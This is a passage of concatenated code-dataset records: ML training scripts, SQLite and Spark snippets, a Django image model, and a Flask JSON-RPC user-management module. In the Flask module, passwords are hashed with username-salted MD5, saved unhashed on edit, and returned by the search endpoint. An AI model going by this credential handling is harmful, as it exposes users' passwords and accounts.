data\r\n\tx_train=data_gather.ggg()\r\n\t\r\n\t# model\r\n\tautoencoder, encoder,encoder1= create_model(ndim)\r\n\t\r\n\t# train model\r\n\tautoencoder = train_model(autoencoder, x_train, batch_size, epochs)\r\n\t\r\n\t# encoded signal\r\n\tx_test=data_gather4.ggg()\r\n\tencodedsig = encoder1.predict(x_train)\r\n\tencodedsig1=encoder1.predict(x_test)\r\n\r\n\t#encodedsig = autoencoder.predict(x_train)\r\n\t#encodedsig1=x_train\r\n\treturn(encodedsig,encodedsig1)\r\nfrom sklearn.model_selection import KFold\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.svm import NuSVC\r\nimport random\r\n#accur=np.zeros(100)\r\n#for iiii in range(1,100):\r\nx1,yy=main()\r\n\r\n#for index in range(0,9):\r\n # plt.plot(x[:,index])\r\n # 
plt.plot(y[:,index])\r\n # plt.show()\r\n\r\n\r\nX=np.concatenate((x1,yy))\r\nsize=len(X);\r\ny=np.zeros(shape=[size,1])\r\nfor index in range(0,size):\r\n if (size/2-index)>=0:\r\n y[index,0]=0\r\n else:\r\n y[index,0]=1\r\n\r\nkf = KFold(n_splits=20)\r\nkf.get_n_splits(X)\r\nprint(kf)\r\n\r\nKFold(n_splits=20, random_state=None, shuffle=False)\r\nii=0\r\ndum=np.zeros(len(X))\r\nfor train_index, test_index in kf.split(X):\r\n #print(\"TRAIN:\", train_index, \"TEST:\", test_index)\r\n X_train, X_test = X[train_index], X[test_index]\r\n y_train, y_test = y[train_index], y[test_index]\r\n clf=NuSVC()\r\n clf.fit(X_train,y_train)\r\n NuSVC(cache_size=200, class_weight=None, coef0=0.0,\r\n decision_function_shape=None, degree=1, gamma='auto', kernel='rbf',\r\n max_iter=-1, nu=0.5, probability=False, random_state=None,\r\n shrinking=True, tol=0.001, verbose=False)\r\n y_predict=clf.predict(X_test)\r\n for i in range(0,len(y_predict)-1):\r\n if y_predict[i]==y_test[i]:\r\n dum[ii]=1\r\n ii=ii+1\r\n else:\r\n dum[ii]=0\r\n ii=ii+1\r\nprint(\"Accuracy is\")\r\nprint((np.sum(dum)/len(X))*100,\"%\")\r\n \r\n\r\n \r\n \r\n","sub_path":"autoencoder_svm1.py","file_name":"autoencoder_svm1.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
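The hand-rolled 20-fold accuracy loop in the record above can be cross-checked with scikit-learn's own utilities. A sketch reusing the `X` and `y` built in the script; note that `cross_val_score` stratifies its folds for classifiers, so the splits differ slightly from the plain `KFold` used there:

```python
from sklearn.model_selection import cross_val_score
from sklearn.svm import NuSVC

scores = cross_val_score(NuSVC(gamma='auto'), X, y.ravel(), cv=20)
print("Accuracy is {:.2f}%".format(scores.mean() * 100))
```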
+{"seq_id":"239515491","text":"import sys\n\n\ndef load_module_from_file(module_name, filepath, sys_path=None):\n if sys_path:\n sys.path.insert(0, sys_path)\n\n import importlib.util\n spec = importlib.util.spec_from_file_location(module_name, filepath)\n cls = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(cls)\n\n if sys_path:\n sys.path.remove(sys_path)\n\n return cls\n\n\ndef datetime_to_str(dt):\n return dt.strftime('%Y-%m-%dT%H:%M')\n\n\ndef merge_dict(existing_dict, new_dict):\n for config_name, config_value in new_dict.items():\n existing_dict[config_name] = config_value\n\n return existing_dict\n\n\ndef crontab_hour_to_utc(crontab_hour, timezone):\n import re\n\n rebuild_hour_items = []\n for hour_item in re.split(r'([-,])', crontab_hour):\n if hour_item in ['-', ',']:\n rebuild_hour_items.append(hour_item)\n else:\n try:\n hour_num = int(hour_item)\n except ValueError:\n # Error, return original\n return crontab_hour\n\n utc_hour = hour_num - timezone\n\n if utc_hour < 0:\n utc_hour = utc_hour + 24\n\n rebuild_hour_items.append(str(utc_hour))\n\n return ''.join(rebuild_hour_items)\n","sub_path":"server/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"509078077","text":"import argparse\nimport copy\nimport time\nfrom os.path import dirname, abspath, join\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\nimport misc\nimport shutil\nimport model\nfrom dataloader import URPedestrianDataset,Classifier\n# $ python train.py --muiltGPU 0 1 --classnum 0 --batch_size 128\n# $ python train.py --single 0 --classnum 0 --batch_size 128\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--muiltGPU', nargs='+',type=int, default=[0])\nparser.add_argument('--singleGPU', type=int, default=0)\nparser.add_argument('--classnum', type=int, default=0)\nparser.add_argument('--batch_size',type=int,default=64)\nparser.add_argument('--worker_num',type=int,default=16)\nparser.add_argument('--resume',type=str,default='None')\n\nargs = parser.parse_args()\nfor arg in vars(args):\n print(\"{:>13}:{}\".format(arg, getattr(args, arg)))\n# =============================================\n# Load all used net\n# =============================================\nnet = model.BasicResNetClass()\nif args.resume != 'None':\n parameter=torch.load(args.resume,map_location=lambda storage, loc: storage)\n net.load_state_dict(parameter['state_dict'])\n if 'epoch' in parameter:\n print('starting at epoch: ',parameter['epoch'])\n else:\n print('starting from unknown')\n\nif len(args.muiltGPU) > 1 and torch.cuda.device_count() > 1:\n device = torch.device(\n f\"cuda:{args.muiltGPU[0]}\" if torch.cuda.is_available() else \"cpu\")\n print(\"Let's use\", len(args.muiltGPU), \"GPUs!\")\n batch_size = args.batch_size*len(args.muiltGPU)\n worker_num = args.worker_num\n net = nn.DataParallel(net,device_ids=args.muiltGPU).to(device)\n criterion = nn.CrossEntropyLoss().to(device)\n\n # criterion=nn.DataParallel(nn.CrossEntropyLoss(),device_ids=args.muiltGPU).to(device)\nelse:\n device = torch.device(\n f\"cuda:{args.singleGPU}\" if torch.cuda.is_available() else \"cpu\")\n print(f\"Current using {device}\")\n batch_size = args.batch_size\n worker_num = 16\n net = net.to(device)\n criterion = nn.CrossEntropyLoss().to(device)\n\nprint(f\"batch size: {batch_size}, worker number: {worker_num}\")\n\n\n# =============================================\n# Define a Loss function and optimizer\n# =============================================\n\n\nimport torch.optim as optim\noptimizer = optim.Adam(net.parameters(), lr=0.001, betas=(0.9, 0.99))\n\n\ndef train(loader, model, criterion, optimizer, device, log):\n model.train()\n size_batch, size_data = loader.batch_size, len(loader)\n running_acc_20, iteration_acc_20, iteration_acc_50 = 0, 0, 0\n for index, data in enumerate(loader):\n\n inputs = data['frame'].to(device)\n labels = misc.limit_value_tensor(\n data['noise_label'] - 976, 0, 999).to(device)\n real_label=misc.limit_value_tensor(\n data['steer'] - 976, 0, 999).to(device)\n\n optimizer.zero_grad()\n with torch.set_grad_enabled(True):\n outputs = model(inputs)\n _, predicted = torch.max(outputs, 1)\n loss = criterion(outputs, labels)\n acc_50 = misc.accuracy(predicted, real_label, size_batch, 20)\n acc_20 = misc.accuracy(predicted, real_label, size_batch, 50)\n loss.backward()\n optimizer.step()\n running_acc_20 += acc_20\n iteration_acc_20 += acc_20\n iteration_acc_50 += acc_50\n if index % 100 == 99:\n out = 'Iteration: {:>5}/{:<5} {:5} || Acc_20: {:.4f} Acc_50: {:.4f}'.format(\n index, size_data, 'train', iteration_acc_20 / 100, iteration_acc_50/100)\n print(out)\n log.write(out)\n iteration_acc_20, iteration_acc_50 = 0, 0\n 
return running_acc_20 / size_data\n\n\ndef validate(loader, model, criterion, optimizer, device, log):\n model.eval()\n size_batch, size_data = loader.batch_size, len(loader)\n running_acc_20, iteration_acc_20, iteration_acc_50 = 0, 0, 0\n for index, data in enumerate(loader):\n inputs = data['frame'].to(device)\n labels = misc.limit_value_tensor(\n data['noise_label'] - 976, 0, 999).to(device)\n real_label=misc.limit_value_tensor(\n data['steer'] - 976, 0, 999).to(device)\n optimizer.zero_grad()\n with torch.set_grad_enabled(False):\n outputs = model(inputs)\n _, predicted = torch.max(outputs, 1)\n loss = criterion(outputs, labels)\n acc_50 = misc.accuracy(predicted, real_label, size_batch, 20)\n acc_20 = misc.accuracy(predicted, real_label, size_batch, 50)\n running_acc_20 += acc_20\n iteration_acc_20 += acc_20\n iteration_acc_50 += acc_50\n if index % 100 == 99:\n out = 'Iteration: {:>5}/{:<5} {:5} || Acc_20: {:.4f} Acc_50: {:.4f}'.format(\n index, size_data, 'val', iteration_acc_20 / 100, iteration_acc_50/100)\n print(out)\n log.write(out)\n iteration_acc_20, iteration_acc_50 = 0, 0\n return running_acc_20 / size_data\n\n\ndef trainer(dataloader, model, criterion, optimizer, args,num_i, epoch_num=10, checkpoint=0, device=\"cuda:0\"):\n print('======= Start Training =======')\n best_epoch = 0\n best_acc = 0.0\n recorder = open('acc_result.txt', 'w')\n for epoch in range(epoch_num):\n\n time_start = time.time()\n print('Epoch {}/{}'.format(epoch, epoch_num))\n print('=' * 40)\n train_acc = train(dataloader['train'], net,\n criterion, optimizer, device, recorder)\n valid_acc = validate(dataloader['val'], net, criterion,\n optimizer, device, recorder)\n time_elapsed = time.time()-time_start\n print('-' * 10)\n print('complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60))\n output = 'Epoch:{:3} Train Acc={:.3f}, Val Acc={:3f}'.format(\n epoch, train_acc, valid_acc)\n print(output)\n recorder.write(output)\n print('-' * 10)\n\n if valid_acc > best_acc:\n best_acc = valid_acc\n best_epoch = epoch\n is_best = 1\n else:\n is_best = 0\n if checkpoint == 1:\n misc.save_checkpoint({\n 'epoch':epoch+1,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n }, is_best, num=args.classnum,filename=\"checkpoint_v{}_{:02}_{:1}.pth.tar\".format(num_i,epoch,args.classnum))\n recorder.write(f'best epoch: {best_epoch}')\n recorder.close()\n\n\n# =============================================\n# 4. 
Train the network\n# =============================================\n\n# =============================================\n# Split dataset\n# ^^^^^^^^^^^^^\n# Contiguous split\n# train_idx, validation_idx = indices[split:], indices[:split]\n# =============================================\n# if args.dagger\n# dataset_path = join(dirname(dirname(abspath(__file__))), 'data/dataset')\n# dataset = URPedestrianDataset(dataset_path, csv_name='test.csv',classnum=args.classnum,dagger=0)\n#################### DAGGER ==========================================\n# dataset_path = join(dirname(dirname(abspath(__file__))), 'data/dagger')\n# dataset = URPedestrianDataset(dataset_path, csv_name='1.csv' ,classnum=args.classnum,dagger=1)\n\n#============================================================================\n\ndataset_path = join(dirname(dirname(abspath(__file__))), 'data/dataset')\ndataset=Classifier(dataset_path)\nfor i in range(3,8):\n print(f\"====================================================={i}=============================================================================\")\n sampler = misc.split_random_class(dataset.frames,i/10)\n loader = {}\n\n loader = {x: torch.utils.data.DataLoader(dataset,\n batch_size=batch_size, sampler=sampler[x], num_workers=worker_num) for x in\n ['train', 'val']}\n\n print('train batch #:{}, val batch #:{}'.format(\n len(loader['train']), len(loader['val'])))\n print('train #:{}, val #:{}'.format(\n len(loader['train'])*batch_size, len(loader['val'])*batch_size))\n\n\n trainer(loader, net, criterion, optimizer, args,\n epoch_num=50, checkpoint=1, device=device,num_i=i)\n","sub_path":"g7_workspace/model/train_new.py","file_name":"train_new.py","file_ext":"py","file_size_in_byte":8338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
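`misc.limit_value_tensor` is imported but not defined in the record above; judging from how it shifts steering values into the 0-999 class range, a plausible sketch (an assumption, not the project's actual helper) is a thin wrapper over `torch.clamp`:

```python
import torch

def limit_value_tensor(t: torch.Tensor, low: int, high: int) -> torch.Tensor:
    # clamp every element into [low, high] so labels stay valid class indices
    return torch.clamp(t, min=low, max=high)
```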
+{"seq_id":"476391364","text":"import sqlite3\nfrom tg_objects.user import User\n\n\nclass Database:\n \"\"\"\n Represents a database, which keeps track of stuff such as users, sent files, etc.\n \"\"\"\n\n def __init__(self):\n # Start a connection with the database\n self.connection = sqlite3.connect('../Data/lonabot.db')\n\n c = self.connection.cursor()\n\n # Ensure that the Users table exist\n c.execute(\"CREATE TABLE IF NOT EXISTS Users\"\n \"(id INTEGER PRIMARY KEY,\"\n \"firstname VARCHAR, lastname VARCHAR, username VARCHAR)\")\n\n # Ensure that the Files table exist\n c.execute(\"CREATE TABLE IF NOT EXISTS FileAudios\"\n \"(id VARCHAR PRIMARY KEY,\"\n \"telegramid VARCHAR, title VARCHAR, artist VARCHAR)\")\n\n self.connection.commit()\n\n # region Users\n\n def close(self):\n \"\"\"\n Closes the connection with the database\n :return:\n \"\"\"\n self.connection.close()\n\n\n def check_user(self, user):\n \"\"\"\n Checks an user in the database. If it's a new user, it's logged on console and adds it\n :param user: The user to check\n \"\"\"\n c = self.connection.cursor()\n c.execute('SELECT * FROM Users WHERE id=?', (user.id,))\n if c.fetchone() is None:\n print('A new user chatted with the bot: {}'.format(user))\n c.execute(\"INSERT INTO Users VALUES (?, ?, ?, ?)\",\n (user.id, user.name, user.last_name, user.username,))\n\n self.connection.commit()\n\n def get_user(self, username):\n \"\"\"\n Retrieves a known user\n :param username: The username of the user\n :return: The user if found, None otherwise\n \"\"\"\n c = self.connection.cursor()\n c.execute('SELECT * FROM Users WHERE username=?', (username,))\n user = c.fetchone()\n if user is not None:\n return User(user)\n\n return None\n\n def user_count(self):\n \"\"\" Returns the currently logged user count \"\"\"\n c = self.connection.cursor()\n c.execute('SELECT COUNT(*) FROM Users')\n return c.fetchone()[0]\n\n # endregion\n\n # region Files\n\n def check_file_audio(self, file_id):\n \"\"\"\n Checks whether an audio file has already be sent to Telegram servers or not\n :param file_id: The ID representing the file. This may be its hash, or other ID\n :return: Telegram's ID of the file if it was sent before; None otherwise\n \"\"\"\n c = self.connection.cursor()\n c.execute('SELECT telegramid FROM FileAudios WHERE id=?', (file_id,))\n result = c.fetchone()\n if result is not None:\n return result[0]\n\n def add_file_audio(self, file_id, telegram_id, title, artist):\n c = self.connection.cursor()\n c.execute('INSERT INTO FileAudios VALUES (?, ?, ?, ?)',\n (file_id, telegram_id, title, artist))\n\n self.connection.commit()\n\n # endregion\n","sub_path":"src/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"121614446","text":"#!/usr/bin/env python3\r\n#-*- coding:utf-8 -*-\r\nimport sqlite3\r\nimport os\r\nclass dao(object):\r\n\tdef __init__(self,path=\"lyric.db\"):\r\n\t\tself.db_path=path\r\n\t\tself.conn=sqlite3.connect(self.db_path)\r\n\t\tself.cursor=self.conn.cursor()\r\n\tdef create_table(self):\r\n\t\ttry:\r\n\t\t\tself.cursor.execute(\"create table lyric (id varchar(30) primary key,words varchar(5000),twords varchar(5000))\")\r\n\t\t\tprint(\"successfully create table\")\r\n\t\texcept Exception as e:\r\n\t\t\tprint(e) \r\n\tdef insert_lyric(self,song_id,song_lyric,twords):\r\n\t\t\r\n\t\ttry:\r\n\t\t\tr,v=self.query_db(song_id)\r\n\t\t\tif r==0:\r\n\t\t\t\tself.cursor.execute(\"insert into lyric (id, words,twords) values ( ?,?,?)\",(song_id,song_lyric,twords))\r\n\t\t\t\tself.conn.commit()\r\n\t\texcept Exception as e:\r\n\t\t\tprint(\"insert database error \",e)\r\n\t\t\tprint(song_lyric,twords)\r\n\tdef query_db(self,song_id):\r\n\t\tself.cursor.execute('select * from lyric where id=?', (song_id,))\r\n\t\tvalues = self.cursor.fetchall()\r\n\t\tl=len(values)\r\n\t\tif l==0:return 0,None\r\n\t\telse:\r\n\t\t\treturn 1,values\r\n\tdef close_db(self):\r\n\t\tself.cursor.close()\r\n\t\tself.conn.close()\r\n\tdef test(self):\r\n\t\tprint(self.query_db(song_id))\r\n\t\tself.close_db()\r\n\r\nif __name__ == '__main__':\r\n\td=dao()\r\n\td.insert_lyric(\"1\",\"中国人\",\"123\")\r\n\td.cursor.execute('select * from lyric where id=?',('1',) )\r\n\tvalues = d.cursor.fetchall()\r\n\t[print(i) for i in values]\r\n\t\r\n","sub_path":"netease/dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"284073256","text":"from pyspark import SparkContext, SparkConf, SparkFiles\nfrom pyspark.sql import Row, SQLContext\nimport numpy as np\n\nconf = SparkConf().setAppName(\"trying\").setMaster(\"local[*]\")\nsc = SparkContext(conf=conf)\nsqlContext = SQLContext(sc)\n\ncolumns=['name','age','cca','weight']\nname=['tom','alan','david','simon']\nage=[9,3,2,14]\ncca=['basketball','soccer','hockey','badminton']\nweight=[30,40,50,60]\n\nmatrix1 = np.array([name,age,cca,weight])\nprint(matrix1)\nmatrix2 = matrix1.transpose()\nprint(matrix2)\n\nrdd = sc.parallelize(matrix2)\nrdd = rdd.map(lambda x: Row(\n name = str(x[0]),\n age = int(x[1]),\n cca = str(x[2]),\n weight= int(x[3]))\n)\n\ndf = sqlContext.createDataFrame(rdd)\ndf.show()\ndf.printSchema()\ndf=df.select('name','age','weight','cca')\ndf.show()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"376452399","text":"from django.db import models\nfrom django.core.urlresolvers import reverse\nfrom PIL import Image\n\n__author__ = 'Иван Голубых'\n\n\n# #################\n# Группа классов модели для данных страницы примеров работ на JavaScript:\n# #################\nclass ExamplesJs(models.Model):\n ''' Текстовые заголовки уровня
\n '''\n # Порядковый номер объекта на странице:\n ordinal = models.PositiveSmallIntegerField(\n # При blank=True поле может быть пустым\n # (т.е. оно необязательное):\n blank=False,\n # Если строковое поле содержит null=True, это\n # означает, что оно может содержать два возможных\n # “пустых” значения: NULL и пустую строку.\n # Иначе - только пустую строку.\n null=False,\n # Строить ли индекс по этому полю:\n db_index=True,\n # При unique=True значение поля должно быть\n # уникальным.\n unique=True,\n help_text='Порядковый номер объекта на странице',\n verbose_name='Порядковый номер объекта на странице',\n )\n\n # Название проекта:\n name_project = models.CharField(\n max_length=255,\n # При blank=True поле может быть пустым\n # (т.е. оно необязательное):\n blank=False,\n # Если строковое поле содержит null=True, это\n # означает, что оно может содержать два возможных\n # “пустых” значения: NULL и пустую строку.\n # Иначе - только пустую строку.\n null=False,\n # Строить ли индекс по этому полю:\n db_index=False,\n # При unique=True значение поля должно быть\n # уникальным.\n unique=False,\n help_text='Название проекта',\n verbose_name='Название проекта',\n )\n\n # Картинка проекта, если есть.\n image_file = models.ImageField(\n # Куда загружать эти картинки:\n upload_to='examples_js_images/',\n # При blank=True поле может быть пустым\n # (т.е. оно необязательное):\n blank=True,\n verbose_name=\"Картинка проекта\")\n\n # Ссылка на проект в сети:\n net_address = models.CharField(\n max_length=255,\n # При blank=True поле может быть пустым\n # (т.е. оно необязательное):\n blank=True,\n # Если строковое поле содержит null=True, это\n # означает, что оно может содержать два возможных\n # “пустых” значения: NULL и пустую строку.\n # Иначе - только пустую строку.\n null=False,\n # Строить ли индекс по этому полю:\n db_index=False,\n # При unique=True значение поля должно быть\n # уникальным.\n unique=False,\n help_text='Ссылка на проект в сети',\n verbose_name='Ссылка на проект в сети',\n )\n\n # Ссылка на git-репозиторий проекта:\n git_address = models.CharField(\n max_length=255,\n # При blank=True поле может быть пустым\n # (т.е. оно необязательное):\n blank=True,\n # Если строковое поле содержит null=True, это\n # означает, что оно может содержать два возможных\n # “пустых” значения: NULL и пустую строку.\n # Иначе - только пустую строку.\n null=False,\n # Строить ли индекс по этому полю:\n db_index=False,\n # При unique=True значение поля должно быть\n # уникальным.\n unique=False,\n help_text='Ссылка на git-репозиторий проекта',\n verbose_name='Ссылка на git-репозиторий проекта',\n )\n\n # Описание проекта:\n text = models.TextField(\n # При blank=True поле может быть пустым\n # (т.е. 
оно необязательное):\n blank=False,\n # Если строковое поле содержит null=True, это\n # означает, что оно может содержать два возможных\n # “пустых” значения: NULL и пустую строку.\n # Иначе - только пустую строку.\n null=False,\n # Строить ли индекс по этому полю:\n db_index=False,\n # При unique=True значение поля должно быть\n # уникальным.\n unique=False,\n help_text='Описание проекта',\n verbose_name='Описание проекта',\n )\n\n def __str__(self):\n return '{} - {}'.format(self.ordinal, self.text)\n\n def get_absolute_url(self):\n return reverse('admin_examples_work_js')\n\n def delete(self, *args, **kwargs):\n if self.image_file:\n # До удаления записи получаем необходимую информацию\n storage, filepath = self.image_file.storage, self.image_file.path\n # Потом удаляем сам файл\n storage.delete(filepath)\n # Удаляем запись в БД (объект)\n super(__class__, self).delete(*args, **kwargs)\n\n def save(self, *args, **kwargs):\n # Максимальный размер изображения по большей стороне\n _MAX_SIZE = 286\n # Проверяю, есть ли в БД уже этот объект (радактируем старое или\n # создаём новое?):\n old_obj = False\n try:\n old_obj = __class__.objects.get(pk=self.pk)\n except Exception:\n pass\n # Сначала - обычное сохранение\n super(__class__, self).save(*args, **kwargs)\n if old_obj and old_obj.image_file\\\n and ((not self.image_file) or\n (old_obj.image_file.path != self.image_file.path)\n ):\n # удаляю старый файл, если он был стёрт или обновлён на новый:\n storage = old_obj.image_file.storage\n filepath = old_obj.image_file.path\n storage.delete(filepath)\n # Если добавиласть новая картинка или изменилась старая, то создаю\n # уменьшенную копию:\n if self.image_file\\\n and (not old_obj or\n not old_obj.image_file or\n (old_obj.image_file and\n old_obj.image_file.path != self.image_file.path\n )\n ):\n filepath = self.image_file.path\n width = self.image_file.width\n height = self.image_file.height\n max_size = max(width, height)\n image_file = Image.open(filepath)\n # Может, и не надо ничего менять?\n if max_size > _MAX_SIZE:\n # resize - безопасная функция, она создаёт новый объект, а не\n # вносит изменения в исходный, поэтому так\n image_file = image_file.\\\n resize((round(width / max_size * _MAX_SIZE),\n round(height / max_size * _MAX_SIZE)),\n Image.ANTIALIAS\n )\n # И не забыть сохраниться\n image_file.save(filepath)\n# #################\n# Окончание группы классов модели для страницы примеров работ на JavaScript.\n# #################\n","sub_path":"portfolio_django_2017/app_main/models_examples_work_js.py","file_name":"models_examples_work_js.py","file_ext":"py","file_size_in_byte":8817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
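The `save()` override above reduces to one resize rule: shrink the image so its longer side is at most `_MAX_SIZE` pixels. The same logic as a standalone helper, using the PIL calls from the model (a sketch, not part of the app):

```python
from PIL import Image

def shrink_to_max_side(filepath, max_side=286):
    img = Image.open(filepath)
    width, height = img.size
    longest = max(width, height)
    if longest <= max_side:
        return  # already small enough, nothing to do
    scale = max_side / longest
    img = img.resize((round(width * scale), round(height * scale)),
                     Image.ANTIALIAS)  # ANTIALIAS matches the model code
    img.save(filepath)
```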
+{"seq_id":"552982274","text":"from application import jsonrpc\nfrom flask import render_template, g, request, flash, redirect, url_for, json, jsonify\nfrom flask.json import JSONEncoder\nfrom .models import Users, Department, db\nfrom sqlalchemy import or_\nimport hashlib\n\n\n@jsonrpc.method(\"User.list(username=String)\")\ndef user_list(username):\n \"\"\"\n 全部用户数据,现在是方便开发,所以将全部数据返回\n 实际开发中,用户第一次查看公司应该只返回部门,然后点击对应部门再查询对应部门的员工信息。\n 这么做的好处是,每次查询只需要用到部门表,极大提高了响应前端请求,减少数据库的压力\n :param username: 确认前端是否用户已登录(前端已校验,这么做是为了双重校验)\n :return: 返回除密码外的全部用户信息\n \"\"\"\n # 校验用户是否存在\n username = username[\"username\"]\n user_jc = Users.query.filter(Users.username == username).all()\n if len(user_jc) <= 0:\n return {\"message\": \"fail\", \"error\": \"无此用户\"}\n\n \"\"\"用户列表,过滤已删除用户\n show 是否显示的用户\n deleted 是否删除用户\n desc 按照什么排序,下面是sort如果没有则按id排序\n 你也可以用简单的:user_list_jc = Users.query.all()\n \"\"\"\n user_list_jc = Users.query.filter(\n Users.is_show == True,\n Users.is_deleted == False\n ).order_by(\n db.desc(Users.sort),\n db.desc(Users.id)\n ).all()\n data = []\n for user in user_list_jc:\n \"\"\"遍历对象信息并提取出来,__to_dict__是讲对象转化成字典的方法\n 这里的filter是一种传参搜索的方法,还有filter_by则是赋值搜索,一般建议用前者,后者用or等搜索会比较麻烦\n \"\"\"\n item = user.__to_dict__(['id', \"username\", 'mobile', 'department_id', 'create_time', 'update_time'])\n department_jc = Department.query.filter(Department.id == item[\"department_id\"]).all()\n for user_department in department_jc:\n \"\"\"将部门名称提取出来放到列表\"\"\"\n one_department_dic = user_department.__to_dict__(['name'])\n item[\"department_name\"] = one_department_dic[\"name\"]\n data.append(item)\n print(\"user_list_Data-------->\", data)\n return data\n\n\n@jsonrpc.method(\"Search.user(username=String)\")\ndef search_user(username):\n \"\"\"\n 个人用户列表,未做密码检查\n :param username: 用户名\n :return: 返回用户个人信息\n \"\"\"\n username = username[\"username\"]\n user_jc = Users.query.filter(Users.username == username).all()\n data = []\n for user in user_jc:\n item = user.__to_dict__(['id', \"username\", 'mobile', 'department_id', 'create_time', 'update_time'])\n department_jc = Department.query.filter(Department.id == item[\"department_id\"]).all()\n # print(\"department1--->\", department_jc)\n for user_department in department_jc:\n \"\"\"将部门名称提取出来放到列表\"\"\"\n user_department_item = user_department.__to_dict__(['name'])\n item[\"department_name\"] = user_department_item[\"name\"]\n data.append(item)\n print(\"search_user_data------>\", data)\n return data\n\n\n@jsonrpc.method(\"Add.user(data=String)\")\ndef add_user(data):\n \"\"\"\n 添加用户\n :param data:传过来的data是字典类型的数据\n :return: 返回成功失败的结果\n 为了数据更安全你可以增加事务回滚(一般在订单付款跟第三方支付的时候设置)\n try:\n # 这里写sql语句组 一旦发生异常执行rollback() 相当于什么都没���行\n connect.commit()\n return 'OK'\n except Exception as error:\n print(error)\n connect.rollback() # 发生异常时执行回滚\n return 'Err'\n \"\"\"\n user_list_jc = Users.query.filter(\n Users.is_show == True,\n Users.is_deleted == False\n ).order_by(\n db.desc(Users.sort),\n db.desc(Users.id)\n ).all()\n username_list = []\n department_list = []\n department_dic = {}\n for user in user_list_jc:\n user_item = user.__to_dict__(['id', \"username\"])\n username_list.append(user_item[\"username\"])\n\n \"\"\"获取部门名称\"\"\"\n department_list_jc = Department.query.filter(\n Department.is_show == True,\n Department.is_deleted == False\n ).order_by(\n db.desc(Department.sort),\n db.desc(Department.id)\n ).all()\n for department_one in department_list_jc:\n department_item = department_one.__to_dict__(['id', \"name\"])\n department_dic[department_item[\"name\"]] = 
department_item['id']\n department_list.append(department_item[\"name\"])\n \"\"\"开始处理小程序发过来的数据\"\"\"\n data = data[\"data\"]\n \"\"\"验证数据\"\"\"\n if data[\"username\"] != '' and data['password'] != '' and data['department'] != '' and data['phone'] != '':\n if data[\"username\"] not in username_list and data['department'] in department_list:\n \"\"\"校验成功后对密码加密并添加数据\"\"\"\n ret = hashlib.md5(data[\"username\"].encode('utf-8')) # 获取用户名,利用不同的用户名来做动态盐 username也可以切片取\n ret.update(data['password'].encode('utf-8'))\n data['password'] = ret.hexdigest()\n \"\"\"下面如果飘背景颜色是正常的,因为还有值我没添加,让它自动生成\"\"\"\n user = Users(\n username=data[\"username\"],\n password=data['password'],\n mobile=data['phone'],\n department_id=department_dic[data['department']],\n )\n db.session.add(user) # 添加\n db.session.commit() # 提交执行\n return {'message': 'success', \"error\": \"\"}\n else:\n return {'message': 'fail', 'error': '用户已存在'}\n\n else:\n return {'message': 'fail', 'error': '有值未填写'}\n\n\n@jsonrpc.method(\"Edit.user(data=String)\")\ndef edit_user(data):\n \"\"\"\n 修改用户信息\n :param data: 用户修改发过来的值\n :return: 返回修改成功或失败\n \"\"\"\n \"\"\"拿出department表\"\"\"\n department_list = []\n department_dic = {}\n\n # 获取全部部门信息\n department_list_jc = Department.query.filter(\n Department.is_show == True,\n Department.is_deleted == False\n ).order_by(\n db.desc(Department.sort),\n db.desc(Department.id)\n ).all()\n for department_one in department_list_jc:\n department_item = department_one.__to_dict__(['id', \"name\"])\n department_dic[department_item[\"name\"]] = department_item['id']\n department_list.append(department_item[\"name\"])\n \"\"\"开始处理小程序发过来的数据\"\"\"\n data = data[\"data\"]\n \"\"\"验证数据\"\"\"\n if data[\"username\"] != '' and data['password'] != '' and data['department'] != '' and data['phone'] != '':\n if data['department'] in department_list:\n \"\"\"直接获取的是列表,里面包含着对象,要提取出来做单独对象才可以丢该\"\"\"\n user_jc = Users.query.filter(Users.username == data[\"username\"]).all()\n user = user_jc[0]\n user.username = data[\"username\"],\n user.password = data['password'],\n user.mobile = data['phone'],\n user.department_id = department_dic[data['department']],\n db.session.commit()\n return {'message': 'success', \"error\": \"\"}\n else:\n return {'message': 'fail', 'error': '修改失败'}\n\n else:\n return {'message': 'fail', 'error': '有值未填写'}\n\n\n@jsonrpc.method(\"Search.data(search_data=String)\")\ndef search_data(search_data):\n \"\"\"\n 模糊查询用户及电话号码,如果也要查询部门,则判断语句即可,或者在前端做选择让传过来的值有多个\n :param search_data: 用户名\n :return: 返回用户个人信息\n \"\"\"\n print(\"search_data--------->\", search_data, type(search_data))\n search_data_str = search_data[\"search_data\"]\n res_list = Users.query.filter(\n or_(Users.username.contains(search_data_str), (Users.mobile.contains(search_data_str)))).all()\n data = []\n for user in res_list:\n item = user.__to_dict__(['id', \"username\", 'password', 'mobile', 'department_id', 'create_time', 'update_time'])\n department_jc = Department.query.filter(Department.id == item[\"department_id\"]).all()\n for user_department in department_jc:\n \"\"\"将部门名称提取出来放到列表\"\"\"\n user_department_item = user_department.__to_dict__(['name'])\n item[\"department_name\"] = user_department_item[\"name\"]\n data.append(item)\n print(\"search_data_data------>\", data)\n return data\n\n\n@jsonrpc.method(\"Department.list\")\ndef department_list():\n \"\"\"\n 全部部门信息\n :return: 返回全部部门信息,并携带一个单独的部门名词列表\n \"\"\"\n department_list_jc = Department.query.filter(\n Department.is_show == True,\n Department.is_deleted == False\n ).order_by(\n 
